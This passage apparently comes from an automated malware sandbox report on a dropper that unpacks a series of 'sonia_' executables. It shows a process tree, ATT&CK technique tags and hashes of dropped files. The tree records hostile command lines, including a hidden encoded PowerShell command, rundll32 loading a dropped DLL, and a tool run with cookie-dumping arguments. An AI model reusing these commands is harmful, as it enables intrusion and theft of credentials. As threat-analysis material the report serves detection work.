                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:320
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1612
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_5.exe
                                                                              sonia_5.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2956
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3828
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_4.exe
                                                                              sonia_4.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:3148
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:3476
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:4664
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3596
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_3.exe
                                                                              sonia_3.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies system certificate store
                                                                              PID:4800
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1168
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:4608
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1736
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_2.exe
                                                                              sonia_2.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2980
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:364
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.exe
                                                                              sonia_1.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Checks computer location settings
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4712
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.exe" -a
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:3036
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 548
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1404
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1824 -ip 1824
                                                                      1⤵
                                                                        PID:3164
                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                        1⤵
                                                                        • Process spawned unexpected child process
                                                                        PID:1912
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          2⤵
                                                                          • Loads dropped DLL
                                                                          PID:2852
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 608
                                                                            3⤵
                                                                            • Program crash
                                                                            PID:3088
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2852 -ip 2852
                                                                        1⤵
                                                                          PID:384
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4800 -ip 4800
                                                                          1⤵
                                                                            PID:1296
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4488 -ip 4488
                                                                            1⤵
                                                                              PID:4200
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2148 -ip 2148
                                                                              1⤵
                                                                                PID:3544
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2148 -ip 2148
                                                                                1⤵
                                                                                  PID:2648
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2544 -ip 2544
                                                                                  1⤵
                                                                                    PID:4208
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4552 -ip 4552
                                                                                    1⤵
                                                                                      PID:3224
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2148 -ip 2148
                                                                                      1⤵
                                                                                        PID:3184
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4488 -ip 4488
                                                                                        1⤵
                                                                                          PID:2976
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4552 -ip 4552
                                                                                          1⤵
                                                                                            PID:484
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2544 -ip 2544
                                                                                            1⤵
                                                                                              PID:392
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2148 -ip 2148
                                                                                              1⤵
                                                                                                PID:3576
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2148 -ip 2148
                                                                                                1⤵
                                                                                                  PID:4576
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2148 -ip 2148
                                                                                                  1⤵
                                                                                                    PID:1320
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2148 -ip 2148
                                                                                                    1⤵
                                                                                                      PID:4812
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2148 -ip 2148
                                                                                                      1⤵
                                                                                                        PID:732
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2148 -ip 2148
                                                                                                        1⤵
                                                                                                          PID:4228
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          1⤵
                                                                                                            PID:1088
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              2⤵
                                                                                                                PID:4572
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                              1⤵
                                                                                                                PID:3692
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:2116
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:4156
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1644 -ip 1644
                                                                                                                    1⤵
                                                                                                                      PID:4068

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                    Execution

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Persistence

                                                                                                                    Modify Existing Service

                                                                                                                    1
                                                                                                                    T1031

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Privilege Escalation

                                                                                                                    Bypass User Account Control

                                                                                                                    1
                                                                                                                    T1088

                                                                                                                    Scheduled Task

                                                                                                                    1
                                                                                                                    T1053

                                                                                                                    Defense Evasion

                                                                                                                    Modify Registry

                                                                                                                    6
                                                                                                                    T1112

                                                                                                                    Disabling Security Tools

                                                                                                                    4
                                                                                                                    T1089

                                                                                                                    Bypass User Account Control

                                                                                                                    1
                                                                                                                    T1088

                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                    1
                                                                                                                    T1497

                                                                                                                    Install Root Certificate

                                                                                                                    1
                                                                                                                    T1130

                                                                                                                    Credential Access

                                                                                                                    Credentials in Files

                                                                                                                    4
                                                                                                                    T1081

                                                                                                                    Discovery

                                                                                                                    Query Registry

                                                                                                                    7
                                                                                                                    T1012

                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                    1
                                                                                                                    T1497

                                                                                                                    System Information Discovery

                                                                                                                    7
                                                                                                                    T1082

                                                                                                                    Peripheral Device Discovery

                                                                                                                    1
                                                                                                                    T1120

                                                                                                                    Process Discovery

                                                                                                                    1
                                                                                                                    T1057

                                                                                                                    Collection

                                                                                                                    Data from Local System

                                                                                                                    4
                                                                                                                    T1005

                                                                                                                    Command and Control

                                                                                                                    Web Service

                                                                                                                    1
                                                                                                                    T1102

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libcurl.dll
                                                                                                                      MD5

                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                      SHA1

                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                      SHA256

                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                      SHA512

                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libcurl.dll
                                                                                                                      MD5

                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                      SHA1

                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                      SHA256

                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                      SHA512

                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libcurl.dll
                                                                                                                      MD5

                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                      SHA1

                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                      SHA256

                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                      SHA512

                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libcurlpp.dll
                                                                                                                      MD5

                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                      SHA1

                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                      SHA256

                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                      SHA512

                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libcurlpp.dll
                                                                                                                      MD5

                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                      SHA1

                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                      SHA256

                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                      SHA512

                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libgcc_s_dw2-1.dll
                                                                                                                      MD5

                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                      SHA1

                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                      SHA256

                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                      SHA512

                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libgcc_s_dw2-1.dll
                                                                                                                      MD5

                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                      SHA1

                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                      SHA256

                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                      SHA512

                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libgcc_s_dw2-1.dll
                                                                                                                      MD5

                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                      SHA1

                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                      SHA256

                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                      SHA512

                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libstdc++-6.dll
                                                                                                                      MD5

                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                      SHA1

                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                      SHA256

                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                      SHA512

                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libstdc++-6.dll
                                                                                                                      MD5

                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                      SHA1

                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                      SHA256

                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                      SHA512

                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libwinpthread-1.dll
                                                                                                                      MD5

                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                      SHA1

                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                      SHA256

                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                      SHA512

                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\libwinpthread-1.dll
                                                                                                                      MD5

                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                      SHA1

                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                      SHA256

                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                      SHA512

                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\setup_install.exe
                                                                                                                      MD5

                                                                                                                      19232553139c3a8eb649f500b2c73b1d

                                                                                                                      SHA1

                                                                                                                      021fc93d668a9c0a5d4736ba7ff1b66cca2f1026

                                                                                                                      SHA256

                                                                                                                      8467ea3fc94ed6a9cfbee8800d22443c98115f74b4591a15418969071d9fadfd

                                                                                                                      SHA512

                                                                                                                      30be2c789e799d8d87263dd6f8837f16dc503f8a64ea7c4f248b0414af9c5f394e16327337d78ab5747507458a07ca1320995e9ac6ace6b265f31e8d3449b091

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\setup_install.exe
                                                                                                                      MD5

                                                                                                                      19232553139c3a8eb649f500b2c73b1d

                                                                                                                      SHA1

                                                                                                                      021fc93d668a9c0a5d4736ba7ff1b66cca2f1026

                                                                                                                      SHA256

                                                                                                                      8467ea3fc94ed6a9cfbee8800d22443c98115f74b4591a15418969071d9fadfd

                                                                                                                      SHA512

                                                                                                                      30be2c789e799d8d87263dd6f8837f16dc503f8a64ea7c4f248b0414af9c5f394e16327337d78ab5747507458a07ca1320995e9ac6ace6b265f31e8d3449b091

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.exe
                                                                                                                      MD5

                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                      SHA1

                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                      SHA256

                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                      SHA512

                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.exe
                                                                                                                      MD5

                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                      SHA1

                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                      SHA256

                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                      SHA512

                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_1.txt
                                                                                                                      MD5

                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                      SHA1

                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                      SHA256

                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                      SHA512

                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_10.exe
                                                                                                                      MD5

                                                                                                                      15f026de10ed9719180b4ac9cf013060

                                                                                                                      SHA1

                                                                                                                      126d2fb521d710c93747f30bc4744f920d6543b9

                                                                                                                      SHA256

                                                                                                                      d5bb1038daf71c40429b13628305b5d10b868325346ca7c611c1dd4f14754636

                                                                                                                      SHA512

                                                                                                                      5856e492fc68ca7b08ac1fce869ade70a00e790d31f4402e1cd49ff3aee93f3a9dd618cc45288a36f4e32af0debb1f289b8f8f20541cd16bb0754b436891a2e4

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_10.txt
                                                                                                                      MD5

                                                                                                                      15f026de10ed9719180b4ac9cf013060

                                                                                                                      SHA1

                                                                                                                      126d2fb521d710c93747f30bc4744f920d6543b9

                                                                                                                      SHA256

                                                                                                                      d5bb1038daf71c40429b13628305b5d10b868325346ca7c611c1dd4f14754636

                                                                                                                      SHA512

                                                                                                                      5856e492fc68ca7b08ac1fce869ade70a00e790d31f4402e1cd49ff3aee93f3a9dd618cc45288a36f4e32af0debb1f289b8f8f20541cd16bb0754b436891a2e4

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_2.exe
                                                                                                                      MD5

                                                                                                                      07bf905fa780599971f491753f3fd389

                                                                                                                      SHA1

                                                                                                                      e476e1bf79f4506e3d62a6e2bfa551a94f66a6ec

                                                                                                                      SHA256

                                                                                                                      6fede90580004364b0bdc8c335e9f17b87b52c156f76a04242c7e054d41ec55f

                                                                                                                      SHA512

                                                                                                                      a44a0082f4e6187665f216fcc8aecb4bef13d4306b63436f11aa16e2c7ff60231712ca17b34bd99422a2bf657fdecef5605c4a758ff3db94a7aac102e1fabba7

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_2.txt
                                                                                                                      MD5

                                                                                                                      07bf905fa780599971f491753f3fd389

                                                                                                                      SHA1

                                                                                                                      e476e1bf79f4506e3d62a6e2bfa551a94f66a6ec

                                                                                                                      SHA256

                                                                                                                      6fede90580004364b0bdc8c335e9f17b87b52c156f76a04242c7e054d41ec55f

                                                                                                                      SHA512

                                                                                                                      a44a0082f4e6187665f216fcc8aecb4bef13d4306b63436f11aa16e2c7ff60231712ca17b34bd99422a2bf657fdecef5605c4a758ff3db94a7aac102e1fabba7

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_3.exe
                                                                                                                      MD5

                                                                                                                      0dead29208b7a4cdaf59a9dc8d49abdf

                                                                                                                      SHA1

                                                                                                                      9708ce500fdca02c5aa77b80dd54b3409b2df40e

                                                                                                                      SHA256

                                                                                                                      72a033d001321f85b8d1c5519d46f0948c557b8b460df73a6ee698e1b325611f

                                                                                                                      SHA512

                                                                                                                      26035dec4b2faa30efd0c3fc643ee9631f536b8721305bfeb63ef4720904dcc7fe4370921ef2fc16018bb96a4d48fe4ed2d924cf1c9cb3f2956097b1053f4e34

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_3.txt
                                                                                                                      MD5

                                                                                                                      0dead29208b7a4cdaf59a9dc8d49abdf

                                                                                                                      SHA1

                                                                                                                      9708ce500fdca02c5aa77b80dd54b3409b2df40e

                                                                                                                      SHA256

                                                                                                                      72a033d001321f85b8d1c5519d46f0948c557b8b460df73a6ee698e1b325611f

                                                                                                                      SHA512

                                                                                                                      26035dec4b2faa30efd0c3fc643ee9631f536b8721305bfeb63ef4720904dcc7fe4370921ef2fc16018bb96a4d48fe4ed2d924cf1c9cb3f2956097b1053f4e34

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_4.exe
                                                                                                                      MD5

                                                                                                                      5668cb771643274ba2c375ec6403c266

                                                                                                                      SHA1

                                                                                                                      dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                      SHA256

                                                                                                                      d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                      SHA512

                                                                                                                      135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_4.txt
                                                                                                                      MD5

                                                                                                                      5668cb771643274ba2c375ec6403c266

                                                                                                                      SHA1

                                                                                                                      dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                      SHA256

                                                                                                                      d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                      SHA512

                                                                                                                      135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_5.exe
                                                                                                                      MD5

                                                                                                                      b2d51d17747fa53a5f550e2474d8ec68

                                                                                                                      SHA1

                                                                                                                      2e28d4d4dc0cab1e03a8ac1da03417152817ef17

                                                                                                                      SHA256

                                                                                                                      43eb9c4278c69730a0ac2381832c10b8c2bd50ec36f96309178f8cf0ab10a72f

                                                                                                                      SHA512

                                                                                                                      8f28edf3cba11e3f1bee8d8fb045603a4d8cbb1c22f67a1de690b5d2396a80ac7df750a1ffec372d1291ecc1cd6fc48e383c57a61e0803a82567df51594d48ec

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_5.txt
                                                                                                                      MD5

                                                                                                                      b2d51d17747fa53a5f550e2474d8ec68

                                                                                                                      SHA1

                                                                                                                      2e28d4d4dc0cab1e03a8ac1da03417152817ef17

                                                                                                                      SHA256

                                                                                                                      43eb9c4278c69730a0ac2381832c10b8c2bd50ec36f96309178f8cf0ab10a72f

                                                                                                                      SHA512

                                                                                                                      8f28edf3cba11e3f1bee8d8fb045603a4d8cbb1c22f67a1de690b5d2396a80ac7df750a1ffec372d1291ecc1cd6fc48e383c57a61e0803a82567df51594d48ec

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_6.exe
                                                                                                                      MD5

                                                                                                                      16c9dde1611731ebe9effd1facec9839

                                                                                                                      SHA1

                                                                                                                      e5d43d3bfc8fdf9b99e7ae6ee1f820a79909e9b0

                                                                                                                      SHA256

                                                                                                                      0eeb59191283964857f15bfab13ce4824ff63017334d9b4c70ef038b682b995e

                                                                                                                      SHA512

                                                                                                                      2d59e2081f9fd4c5593116384b5735f818f6d175855f43448b4fa4938953d3bd394165fa2248b975f3baf921990008972f0faea1d813d23e50b7bff1b0e8ac00

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_6.txt
                                                                                                                      MD5

                                                                                                                      16c9dde1611731ebe9effd1facec9839

                                                                                                                      SHA1

                                                                                                                      e5d43d3bfc8fdf9b99e7ae6ee1f820a79909e9b0

                                                                                                                      SHA256

                                                                                                                      0eeb59191283964857f15bfab13ce4824ff63017334d9b4c70ef038b682b995e

                                                                                                                      SHA512

                                                                                                                      2d59e2081f9fd4c5593116384b5735f818f6d175855f43448b4fa4938953d3bd394165fa2248b975f3baf921990008972f0faea1d813d23e50b7bff1b0e8ac00

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_7.exe
                                                                                                                      MD5

                                                                                                                      f8fdccdc4cc17f6781497d69742aeb58

                                                                                                                      SHA1

                                                                                                                      026edf00ad6a4f77a99a8100060184caeb9a58ba

                                                                                                                      SHA256

                                                                                                                      97f751d8e067a8ff661e6f4cb0eb7cd3033abdb89d5e87e50581e011ff4f4144

                                                                                                                      SHA512

                                                                                                                      ee4969810435ab43fd7fe1cfc42667544cdb9766dacca2258cc4a860983b6477a9c8c74e6e41ef6230a89fd016f8f044eb83ca5e96796a6375dacd28e7254ac1

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4CD3079D\sonia_7.txt
                                                                                                                      MD5

                                                                                                                      f8fdccdc4cc17f6781497d69742aeb58

                                                                                                                      SHA1

                                                                                                                      026edf00ad6a4f77a99a8100060184caeb9a58ba

                                                                                                                      SHA256

